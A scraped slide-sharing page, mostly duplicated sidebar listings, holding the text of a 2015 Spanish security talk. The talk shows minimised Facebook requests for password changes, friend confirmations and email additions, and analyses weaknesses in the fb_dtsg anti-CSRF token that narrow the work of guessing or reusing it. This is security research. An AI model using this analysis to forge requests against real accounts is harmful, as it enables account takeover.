Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
 
Fundamentos de ciberseguridad
Fundamentos de ciberseguridadFundamentos de ciberseguridad
Fundamentos de ciberseguridad
 

Más de Internet Security Auditors

Explotando los datos como materia prima del conocimiento
Explotando los datos como materia prima del conocimientoExplotando los datos como materia prima del conocimiento
Explotando los datos como materia prima del conocimientoInternet Security Auditors
 
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligenciaXIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligenciaInternet Security Auditors
 
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301Internet Security Auditors
 
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOs
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOsProblemática de implementación de un SGSI o un SGCN en contact centers y BPOs
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOsInternet Security Auditors
 
PCI DSS en el Cloud: Transferencia Internacional Datos
PCI DSS en el Cloud: Transferencia Internacional DatosPCI DSS en el Cloud: Transferencia Internacional Datos
PCI DSS en el Cloud: Transferencia Internacional DatosInternet Security Auditors
 
Problematicas de PCI DSS en Contact Centers & BPO
Problematicas de PCI DSS en Contact Centers & BPOProblematicas de PCI DSS en Contact Centers & BPO
Problematicas de PCI DSS en Contact Centers & BPOInternet Security Auditors
 
Proteccion de Datos Personales: Conceptos, Sanciones, Metodologia
Proteccion de Datos Personales: Conceptos, Sanciones, MetodologiaProteccion de Datos Personales: Conceptos, Sanciones, Metodologia
Proteccion de Datos Personales: Conceptos, Sanciones, MetodologiaInternet Security Auditors
 
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)Internet Security Auditors
 
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...Internet Security Auditors
 
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las SancionesConferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las SancionesInternet Security Auditors
 
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones AndroidCIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones AndroidInternet Security Auditors
 
NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.Internet Security Auditors
 
OWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsOWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsInternet Security Auditors
 

Más de Internet Security Auditors (17)

Explotando los datos como materia prima del conocimiento
Explotando los datos como materia prima del conocimientoExplotando los datos como materia prima del conocimiento
Explotando los datos como materia prima del conocimiento
 
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligenciaXIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
XIII Jornadas STIC CCN-CERT. OSINT de la información a la inteligencia
 
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
Proceso de implementación de los sistemas de gestión ISO 27001 e ISO 22301
 
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOs
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOsProblemática de implementación de un SGSI o un SGCN en contact centers y BPOs
Problemática de implementación de un SGSI o un SGCN en contact centers y BPOs
 
PCI DSS en el Cloud: Transferencia Internacional Datos
PCI DSS en el Cloud: Transferencia Internacional DatosPCI DSS en el Cloud: Transferencia Internacional Datos
PCI DSS en el Cloud: Transferencia Internacional Datos
 
Problematicas de PCI DSS en Contact Centers & BPO
Problematicas de PCI DSS en Contact Centers & BPOProblematicas de PCI DSS en Contact Centers & BPO
Problematicas de PCI DSS en Contact Centers & BPO
 
PCI DSS: Justificacion del Cumplimiento
PCI DSS: Justificacion del CumplimientoPCI DSS: Justificacion del Cumplimiento
PCI DSS: Justificacion del Cumplimiento
 
Proteccion de Datos Personales: Conceptos, Sanciones, Metodologia
Proteccion de Datos Personales: Conceptos, Sanciones, MetodologiaProteccion de Datos Personales: Conceptos, Sanciones, Metodologia
Proteccion de Datos Personales: Conceptos, Sanciones, Metodologia
 
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
GigaTIC 2017 - Más allá del futuro: Negocio, tecnología y robótica. (Abril 2017)
 
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
Conferencia sobre Protección de Datos (Bogotá): Errores comunes en la identif...
 
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las SancionesConferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
Conferencia sobre Protección de Datos (Bogotá): Aprendiendo de las Sanciones
 
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones AndroidCIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
 
NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.NcN2015. Técnicas OSINT para investigadores de seguridad.
NcN2015. Técnicas OSINT para investigadores de seguridad.
 
OWASP Meeting. Tratamiento de Datos
OWASP Meeting. Tratamiento de DatosOWASP Meeting. Tratamiento de Datos
OWASP Meeting. Tratamiento de Datos
 
OWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsOWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application Assessments
 
OWASP Meeting. PCI DSS, un proceso continuo
OWASP Meeting. PCI DSS, un proceso continuoOWASP Meeting. PCI DSS, un proceso continuo
OWASP Meeting. PCI DSS, un proceso continuo
 
OWASP Meeting. Análisis de ECO
OWASP Meeting. Análisis de ECOOWASP Meeting. Análisis de ECO
OWASP Meeting. Análisis de ECO
 

Último

tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..RobertoGumucio2
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxMariaBurgos55
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxAlexander López
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptJavierHerrera662252
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxJOSEMANUELHERNANDEZH11
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que sonEl uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que son241514984
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxAlexander López
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 

Último (20)

tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..Plan Sarmiento - Netbook del GCBA 2019..
Plan Sarmiento - Netbook del GCBA 2019..
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativa
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
Segunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptxSegunda ley de la termodinámica TERMODINAMICA.pptx
Segunda ley de la termodinámica TERMODINAMICA.pptx
 
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptxLAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
LAS_TIC_COMO_HERRAMIENTAS_EN_LA_INVESTIGACIÓN.pptx
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.pptTEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
TEMA 2 PROTOCOLO DE EXTRACCION VEHICULAR.ppt
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
Hernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptxHernandez_Hernandez_Practica web de la sesion 11.pptx
Hernandez_Hernandez_Practica web de la sesion 11.pptx
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que sonEl uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante que son
 
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptxEl_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
El_Blog_como_herramienta_de_publicacion_y_consulta_de_investigacion.pptx
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 

Vulnerabilidades ayer hoy

  • 1. Su Seguridad es Nuestro Éxito Vicente Aguilera Díaz Socio. Director Dpto. Auditoría vaguilera@isecauditors.com - @VAguileraDiaz Vulnerabilidades animadas de ayer y hoy Hack&Beers Barcelona 20 de febrero de 2015
  • 3. Índice 1. ¿No aprendemos? 2. Una vulnerabilidad especial 3. Análisis rápido sobre Facebook Vulnerabilidades animadas de ayer y hoy
  • 12. Modificación de contraseña Petición estándar: POST /ajax/settings/account/password.php HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&password_strength=2&password_old=123&pass word_new=1234&password_confirm=1234&__user=9996417249539&__a=1&__ dyn=7nm8RW8BgCByXzpQ9UoGyk4BBxN6yUmnOVbGAFp9qzQC-C26x5- 9V8CdDx2vBhEoBBzEy78ZS2zUy3yo&__req=30&ttstamp=36581708955714778 31176789518710056&__rev=1601460 Vulnerabilidades animadas de ayer y hoy
  • 13. Modificación de contraseña Petición “mínima”: POST /ajax/settings/account/password.php HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&password_strength=2&password_old=123&pass word_new=1234&password_confirm=1234&__user=9996417249539&__a=1 Vulnerabilidades animadas de ayer y hoy
  • 14. Confirmar petición de amistad Petición estándar: POST /ajax/reqs.php HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&confirm=9316813227&type=friend_connect&requ est_id=9316813227&list_item_id=9316813227_1_req&status_div_id=931681322 7_1_req_status&inline=1&ref=jewel&ego_log=AS8k5U8Ov5FMMQ2rPKND8uFV w2tLuXNakEN4ZAed90GWvx5j1oeb6ui2oLz812a_EGwV5p7ovtWd7IZsdwss4k_ 4Yu66h7ZavA2S5KQJQFQZzXNpnGKvn_1VJMQIPBpE8BRYywXrdiR2DBeqpO bVBQ&actions[accept]=1&nctr[_mod]=pagelet_bluebar&__user=9996417249539 &__a=1&__dyn=7nm8RW8BgCByXzpQ9UoGyk4BBxN6yUmnOVbGAFp9qzQC- C26x59V8CdDx2vBhEoBBzEy78ZS2zUy3yo&__req=30&ttstamp=36581708955 71477831176789518710056&__rev=1601460 Vulnerabilidades animadas de ayer y hoy
  • 15. Confirmar petición de amistad Petición “mínima”: POST /ajax/reqs.php HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&confirm=9316813227&type=friend_connect&req uest_id=9316813227&list_item_id=9316813227_1_req&status_div_id=93168132 27_1_req_status&__user=9996417249539&__a=1 Vulnerabilidades animadas de ayer y hoy
  • 16. Añadir dirección de email secundaria Petición estándar: POST /settings/email/add/submit/ HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&new_email=test%40test.com&__user=99964172 49539&__a=1&__dyn=7nm8RW8BgCByXzpQ9UoGyk4BBxN6yUmnOVbGAFp9 qzQC-C26x5- 9V8CdDx2vBhEoBBzEy78ZS2zUy3yo&__req=30&ttstamp=36581708955714778 31176789518710056&__rev=1601460 Vulnerabilidades animadas de ayer y hoy
  • 17. Añadir dirección de email secundaria Petición “mínima”: POST /settings/email/add/submit/ HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&new_email=test%40test.com&__user=99964172 49539&__a=1 Vulnerabilidades animadas de ayer y hoy
  • 18. Añadir foto de perfil Petición estándar: POST /ajax/timeline/profile_pic_upload?source=megaphone_activation&__user= 9996417249539 &__a=1&__ dyn=7nm8RW8BgCByXzpQ9UoGyk4BBxN6yUmnOVbGAFp9qzQC-C26x5- 9V8CdDx2vBhEoBBzEy78ZS2zUy3yo&__req=30&ttstamp=36581708955714778 31176789518710056&__rev=1603460 HTTP/1.1 Host: upload.facebook.com ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="fb_dtsg" BSFY7tMXuZW3Wd8 ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="profile_id" 9996417249539 ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="file"; filename="noback.jpg" Content-Type: image/jpeg Vulnerabilidades animadas de ayer y hoy
  • 19. Añadir foto de perfil Petición mínima: POST /ajax/timeline/profile_pic_upload?source=megaphone_activation&__user=99964 17249539&__a=1 HTTP/1.1 Host: upload.facebook.com ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="fb_dtsg" BSFY7tMXuZW3Wd8 ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="profile_id" 9996417249539 ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="file"; filename="noback.jpg" Content-Type: image/jpeg Vulnerabilidades animadas de ayer y hoy
  • 20. …. y podemos extrapolarlo al resto de operativas Vulnerabilidades animadas de ayer y hoy
  • 21. fb_dtsg : el Santo Grial Vulnerabilidades animadas de ayer y hoy
  • 23. fb_dtsg • Longitud: 15 • Rango de caracteres: – [A-Z] – [a-z] – [0-9] – [_] Vulnerabilidades animadas de ayer y hoy
  • 24. fb_dtsg • Único por usuario y petición Vulnerabilidades animadas de ayer y hoy
  • 25. fb_dtsg • Único por usuario y petición – ¡No se destruyen tras la petición! Vulnerabilidades animadas de ayer y hoy
  • 26. fb_dtsg • 3 últimos caracteres no afectan Vulnerabilidades animadas de ayer y hoy
  • 27. fb_dtsg • 3 últimos caracteres no afectan – pueden ser eliminados directamente Vulnerabilidades animadas de ayer y hoy
  • 28. fb_dtsg • 2 primeros caracteres no suelen variar Vulnerabilidades animadas de ayer y hoy
  • 29. fb_dtsg • 2 primeros caracteres no suelen variar – fb_dtsg = AQ… Vulnerabilidades animadas de ayer y hoy
  • 30. fb_dtsg • Hasta ahora tenemos: fb_dtsg = AQ XXXXXXXXXX YYY Vulnerabilidades animadas de ayer y hoy
  • 31. fb_dtsg • Otras consideraciones: – Usuarios con mayor actividad generarán más tokens válidos… – Evitar posibles medidas abusando operativas no sensibles – Y … Vulnerabilidades animadas de ayer y hoy
  • 32. fb_dtsg • Otras consideraciones: – Usuarios con mayor actividad generarán más tokens válidos… – Evitar posibles medidas abusando operativas no sensibles – Hay muchas otras vías de análisis – y … Vulnerabilidades animadas de ayer y hoy
  • 33. fb_dtsg ¡El resto es imaginación¡ No limites tu capacidad de inventiva: mente abierta Vulnerabilidades animadas de ayer y hoy
  • 34. fb_dtsg ¡El resto es imaginación¡ No limites tu capacidad de inventiva: mente abierta Vulnerabilidades animadas de ayer y hoy
  • 35. Su Seguridad es Nuestro Éxito C. Santander, 101. Edif. A. 2º E-08030 Barcelona (Spain) Tel.: +34 93 305 13 18 Fax: +34 93 278 22 48 C. Arequipa, 1 E-28043 Madrid (Spain) Tel.: +34 91 763 40 47 Fax: +34 91 382 03 96 info@isecauditors.com www.isecauditors.com ? C. Santander, 101. Edif. A. 2º E-08030 Barcelona (Spain) Tel.: +34 93 305 13 18 Fax: +34 93 278 22 48 C. Arequipa, 1 E-28043 Madrid (Spain) Tel.: +34 91 763 40 47 Fax: +34 91 382 03 96 info@isecauditors.com www.isecauditors.com Vicente Aguilera Díaz www.vicenteaguileradiaz.com @VAguileraDiaz
  • 36. Su Seguridad es Nuestro Éxito C. Santander, 101. Edif. A. 2º E-08030 Barcelona (Spain) Tel.: +34 93 305 13 18 Fax: +34 93 278 22 48 C. Arequipa, 1 E-28043 Madrid (Spain) Tel.: +34 91 763 40 47 Fax: +34 91 382 03 96 info@isecauditors.com www.isecauditors.com Su Seguridad es Nuestro Éxito C. Santander, 101. Edif. A. 2º E-08030 Barcelona (Spain) Tel.: +34 93 305 13 18 Fax: +34 93 278 22 48 C. Arequipa, 1 E-28043 Madrid (Spain) Tel.: +34 91 763 40 47 Fax: +34 91 382 03 96 info@isecauditors.com www.isecauditors.com